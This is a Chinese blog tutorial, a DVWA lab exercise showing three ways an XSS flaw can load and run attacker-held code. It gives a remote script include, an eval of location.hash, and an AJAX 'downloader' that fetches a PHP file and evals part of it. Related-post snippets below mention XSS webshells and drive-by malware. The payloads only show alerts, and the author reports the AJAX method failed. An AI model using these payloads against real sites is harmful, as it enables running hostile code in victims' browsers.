【XSS漏洞04】XSS漏洞对shellcode的调用方法

已于 2022-07-01 04:21:52 修改
阅读量3k 收藏 3
点赞数 1
分类专栏: # 筑基07:WEB漏洞原理 文章标签: xss 安全 web安全
于 2022-02-24 17:06:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fighting_hawk/article/details/123109354
版权

目录

0 前言

在上一节我们了解了XSS漏洞验证、语句构造与绕过的方法,在此基础上,当发现漏洞存在时,需要了解存在哪些利用漏洞执行shellcode的方法。

1 实验简介

1.1 实验目的

模拟利用XSS漏洞执行shellcode的几种方法。

1.2 实验环境

  1. 本实验均在虚拟机中进行,桥接到同一局域网中。
  2. 服务器:win2008,部署WAMP环境和DCWA平台,参考文章《WAMP环境+DVWA漏洞测试平台搭建过程》IP地址为192.168.1.7。
  3. 靶机:winxp,IP地址为192.168.1.8。访问服务器的dvwa页面,设置security级别为low,在反射型XSS页面测试以下方法。
    在这里插入图片描述

2 shellcode的调用实验

shellcode就是利用漏洞所执行的代码。完整的XSS攻击会将shellcode存放在一个地方,然后在存在XSS漏洞的地方触发漏洞去调用代码。

2.1 远程调用JS

  1. 简介:可以将JS代码单独存放在一个JS文件中,然后通过http协议远程加载该脚本。
  2. 在win2008虚拟机中,开启phpstudy。在网站根目录下,新建文件命名为xss1.js,输入内容为alert('xss1.js'),保存文件。
    在这里插入图片描述
  3. winxp范围dvwa页面,并在输入框中输入<script src="http://192.168.1.7/xss1.js"></script>,点击submit后弹出窗口,说明xss1.js代码已被执行。
    在这里插入图片描述

2.2 利用Windows.location.hash触发JS

  1. Windows.location.hash简介:该方法会获取URL中#后面的内容,包括#号。
  2. 可以使用JS中的Windows.location.hash方法获取浏览器URL地址栏的XSS代码,也就是说触发时代码存在与URL中。
  3. 在win2008中,访问之前部署好的DVWA环境,登录账号密码,将security级别设置为low。
  4. 构造以下代码传入URL中。?name=<script>eval(location.hash.substr(1))</script>#alert('This is window.location.hash'),回车可以可以看到触发弹窗并执行代码。
    在这里插入图片描述

2.3 利用XSS下载器

  1. 简介:XSS下载器就是将XSS代码写到网页中,然后通过AJAX技术,取得翻页中的XSS代码。
  2. AJAX技术简介:不是新的编程语言,而是一个技术,旨在实现下面几个功能:
    1. 不刷新页面更新网页
    2. 在页面加载后从服务器请求数据
    3. 在页面加载后从服务器接收数据
    4. 在后台向服务器发送数据
    5. 详细请点击《AJAX 简介》查看。
  3. 首先,在win2008网站根目录下先创建一个文件,命名为xss3.php,写入以下内容。由于AJAX技术会受到浏览器同源策略的限制,为解决这个问题,我们需要在服务器端代码中添加header开头的两句话。
<?php
header('Access-Contro-Allow-Origin:*');
header('Access-Contro-Allow-Headers:Origin, X-Requested-With, Content-type,Accept');
?>
~~~BOF|alert(/AJAX/)|EOF~~~

在这里插入图片描述
5. 采用DVWA漏洞所在处进行测试,输入以下代码回车,按理说会弹出窗口,但是实验失败了,暂未发现原因。

<script>
function XSS(){
	if (window.XMLHttpRequest){
		a = new XMLHttpRequest();
	}else if (window.ActiveXObjest){
		a = new ActiveXObjest("Microsoft.XMLHTTP");
	}else {return;}
	a.open('get','http://192.168.1.7/xss3.php',false);
	a.send();
	b=a.responseText;
	eval(unescape(b.substring(b.indexOf('BOF|')+4,b.indexOf('|EOF'))));	
}
XSS();
</script>

2.4 备选储存技术

shellcode还可以存储在客户端的本地域中,比如HTTP Cookie、Flash 共享对象、UserData、localStorage等。

3 总结

  1. shellcode可以存储在远程文件、URL、HTTP头、其他网页中;
  2. 通过多种方式利用XSS漏铜触发shellcode执行;
  3. 利用XSS下载器与http头信息的方法还需要加强。
Fighting_hawk
关注
专栏目录
discuz xssshell
Coisini的博客
05-26 1465
Discuz XSSwebshell By racle @tian6.com 欢迎转帖.但请保留版权信息. 受影响版本:Discuz<=6.1.0,gbk+utf+big5 新增加完全JS利用版本,只有一个文件.ajax-racle.js.有效版本提升至DZ6.1(理论上7.0版本都可以,但是6.1以上版本都已经默认打上补丁),新增浏览器版本判断,对方浏览器为IE或FIREFOX都有效. ...
XSS ShellCode调用
N1nG
09-23 2119
1.动态调用远程JavaScript 假设www.bug.com是某个页面含有一个XSS漏洞,Exploit如下: http://www.bug.com/view.php?sort=[Exploit] 可以直接把Shellcode写到URL参数中,如: http://www.bug.com/view.php?sort=">alert(/xss/) 方便起见可以把Shellcode写到其他
xssshellcode调用
weixin_43803070的博客
05-22 337
sshellcode 首先,我们来认识一下shellcode,所谓的shellcode就是指利用一个漏洞的时候所执行的脚本,在xss跨站脚本中,是指由Javascript等脚本编写的xss利用代码。 一、动态远程调用JavaScript 假设某个页面中由xss漏洞,所以我们可以把JavaScript代码放到目标网站的参数中。,但是这种方式有一个缺点,那就是容易被用户发现。所以为了方便起见,我们可以...
利用XSS Shell进行XSS测试
weixin_30527423的博客
11-03 111
0x01 XSS Shell简介 XSS Shell一个windows环境下的XSS攻击平台。下载地址为:http://www.portcullis-security.com/tools/free/XSSShell039.zip 利用XSS Shell,攻击者可以轻松攻击存在XSS漏洞的网站的用户。目前可以实施的攻击包括但不限于: 1、获取用户cookie; 2、获取用户当前...
XSS----shellcode调用
喝咖啡的猫的博客
09-24 806
shellcode、exploit、poc shellcode:最初是指溢出程序和蠕虫病毒核心,实际上是指利用漏洞所执行的一段代码 Exploit:英文意思利用,编写好的漏洞利用工具或程序,具有攻击性 Poc:Proof of Concept缩写,是一段证明漏洞存在的程序代码 动态调用远程JavaScript(缺点是URL中容易显露出来) 格式:...
XSS漏洞】通过XSS实现网页挂马
Monsterlz123的博客
06-07 7862
XSS漏洞】通过XSS实现网页挂马 Hello,各位小伙伴们大家好~ 端午假期第一天,大家玩嗨了嘛? 小编是玩嗨了,毕竟已经拖更五天了… 好啦,直接进入正题吧,前面也写了两期XSS相关的内容,今天就来点高大上的(并不是!),我们来通过XSS实现网页挂马吧~ 一、准备工作 实验拓扑: 实验分为两部分: 1、通过Kali linux,利用MS14_064漏洞,制作一个木马服务器。存在该漏洞的...
通过DVWA学习反射型XSS漏洞
Mi1k7ea
03-04 4892
XSS,全称cross-site scripting,是用于攻击Web客户端而不是服务器端,其最大的特点是能把恶意的JS或HTML代码注入到用户浏览的网页上。而XSS漏洞的存在,主要是由于Web应用程序对用户的输入没有进行严格的过滤所导致的,当攻击者把恶意代码注入到网页时,用户只要访问该网页就会执行其中的恶意代码。关于其更具体的描述在网上也很多资料这里就不多说了直接进行总结整合。 XSS漏洞
XSS漏洞,通过XSS实现网页挂马
qq_2411772106的博客
02-11 2232
首先我们的目标是一个存在存储型 XSS 漏洞的网页,看过我前面文章的小伙伴们应该知道,DVWA 平台上就有专门给我们练习存储型 XSS 漏洞的页面,我们就通过这个网页来实践挂马。2、将木马服务器的URL,插入到一个存在存储型XSS漏洞的正常web服务器中,一旦有人访问该服务器的挂马页面,而且该用户存在MS14_064漏洞,就会中招。攻击载荷模块(payload),目标系统被成功渗透后执行的代码,payload 中的主要内容包括 shellcode,一段获取 shell 的代码。
漏洞利用中的Shellcode编写技巧
通过利用漏洞,攻击者可以将Shellcode注入到受攻击的程序中,从而实现对目标系统的控制或执行特定的操作。 ## 1.2 Shellcode漏洞利用中的重要性 Shellcode漏洞利用中扮演着至关重要的角色。通过合理编写和利用...
web安全测试之 xss攻击
热门推荐
谷洪的博客
04-19 4万+
web安全测试之 xss攻击 软件测试资源分享| 免费软件测试资料一、 背景知识1、 什么是 XSS 攻击?XSS 攻击: 跨站脚本攻击(Cross Site Scripting) , 为不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。 故将跨站脚本攻击缩写为 XSS。 跨站脚本攻击, 是 Web 程序中常见的漏洞XSS 属于被动式且用于客户端的攻击方式, 所以...
Python-JShellXSS获取一个JavaScriptshell
08-10
JShell - 用XSS获取一个JavaScript shell
xssshell2.0
08-02
xssshell 2.0 非常好用xss跨站工具. author:darkwahaha
Go-XSShell是一个XSS反向shell框架
08-14
XSShell是一个跨站点脚本的反向shell ...好吧,也许它不是一个真正的反向shell,但它允许你与XSS受害者的浏览器实时交互。
web渗透-xss介绍>
weixin_45540964的博客
11-20 318
(1) .简介 --称为跨站脚本攻击 -主要基于.javascript_js 完成恶意的攻击行为 -js可以灵活的操作html,css和浏览器 --XSS通过精心构造(js)代码注入到网页中 由浏览器解释运行这段js,以达到攻击 -用户访问网页时,XSS脚本就会被提取出来 用户浏览器解析后就会收到攻击 --用户最简单的动作就是使用浏览器上网,并且浏览器中 存在javascript解析器, 但解析器并不会判断代码是否恶意 .XSS漏洞在服务器上 .XSS的攻击对象
XSS也能getshell
u014213713的专栏
05-15 5674
我的想法是这样的 有很多CMS都有 修改模板或者修改文件的功能 我们可以自己构造一个外部的URL去post提交修改模板或其他文件 从而实现XSSgetshell !同样这方法能做很多事情比如增加管理员账号什么的 前提条件要管理员登陆状态下 若CMS系统有XSS漏洞那就更完美了 呵呵 我这里随便找了一套带文件增 删 改 的cms测试呵呵(这CMS也有XSS不过因为魔术原因利用起来不太利索,这
XSS 跨站脚本攻击之ShellCode调用
a18946983682的博客
08-08 354
1.ShellCode,最初是溢出程序和蠕虫病毒的核心,实际上是指利用一个漏洞是所执行的代码,在XSS跨站脚本中,是指由javascript等脚本编写的XSS利用代码; 2.Exploit,在黑客眼里就是漏洞利用,通常表示完整编写好的漏洞利用工具(或程序),具有一定的攻击性;Exploit往往包含了shellcode 3.POC:即Proof of Concept,是一段...
XSS漏洞-06】XSS漏洞利用案例(浏览器劫持、会话劫持、GetShell)—基于神器beEF
m0_64378913的博客
06-02 4408
(1)了解beEF工具的使用; (2)加深理解XSS漏洞的利用和危害; (3)掌握浏览器劫持的攻击方法; (4)掌握会话劫持的攻击方法; (5)掌握通过XSS漏洞GetShell方法
记一次XSS至getshell全过程!
最新发布
hot_milk1的博客
02-27 1358
偶然在一次渗透过程中发现一个客服系统聊天界面发现可以XSS对发送信息处进行抓包,可在content参数插入xss语句这是访客前台效果:这是后台管理的效果:而且只要客服查看信息,便可以执行XSS语句然并卵,本来想钓客服的cookie,登录后台,找到shell点,成功getshell(幻想时间),但是经过测试,发现该客服系统的session是受保护的,并不能窃取到cookie已经决定放弃这个点了,随后在审计源码后,发现了图片上传点老样子,抓包改后缀解码得知,不支持php的文件格式。
XSS漏洞-04】如何调用XSS漏洞shellcode
m0_64378913的博客
05-15 1664
目录1 实验简介1.1 实验目的1.2 实验环境2 shellcode调用实验2.1 远程调用JS2.2 利用Windows.location.hash触发JS2.3 利用XSS下载器2.4 备选存储技术 在上两节中我们了解了XSS漏洞验证、语句构造与绕过的方法,而完整的XSS攻击会将shellcodeshellcode就是利用漏洞所执行的代码)存放在一个地方,然后在存在XSS漏洞的地方触发漏洞调用代码。 1 实验简介 1.1 实验目的 模拟利用XSS漏洞执行shellcode的几种方法。 1.2 实
360发现Ecshop会员中心严重XSS漏洞修复方法
修复此漏洞方法需要确保对用户输入进行严格的输入验证和转义,可以考虑使用更强大的XSS过滤库或者对敏感操作进行二次验证,以避免恶意代码的执行。具体步骤可能包括但不限于: 1. 使用预编译的正则表达式或现成的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值